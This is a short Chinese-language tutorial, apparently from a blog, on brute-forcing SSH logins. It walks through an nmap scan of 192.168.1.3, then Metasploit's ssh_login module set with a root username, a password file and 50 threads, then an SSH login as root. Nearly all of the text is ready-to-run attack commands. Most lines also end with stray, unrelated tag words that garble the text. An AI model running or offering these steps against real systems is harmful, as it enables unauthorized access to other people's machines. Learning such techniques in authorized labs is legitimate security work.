在終端中輸入命令「nmap 192.168.1.3」,對目標主機進行端口掃描,發現主機開放22端口;ssh
在終端中輸入命令「msfconsole」,啓動MSF終端工具
在終端中輸入命令「search ssh_login」,搜索ssh_login的相關工具和攻擊載荷;線程
在終端中輸入命令「use auxiliary/scanner/ssh/ssh_login」,啓用漏洞利用模塊, 提示符就會提示進入到該路徑下;io
在終端中輸入命令「show options」,查看須要設置的相關項,「yes」表示必須填寫的參數;console
在終端中輸入命令「set RHOST 192.168.1.3」,設置目標主機的IP地址;搜索
在終端中輸入「set USERNAME root」,指定登錄用戶名root;終端
在終端中輸入「set PASS_FILE /home/passwd.txt」,設置暴利破解的密碼文件路徑;map
在終端中輸入「set THREADS 50」,設置暴利破解的線程數爲50;密碼
在終端中輸入「run」,開始向目標主機爆破ssh的登錄賬號和密碼,若是爆破成功,就會顯示登錄賬號爲root,密碼爲Xxx;端口
在終端中輸入「ssh root@192.168.1.3」,鏈接目標主機;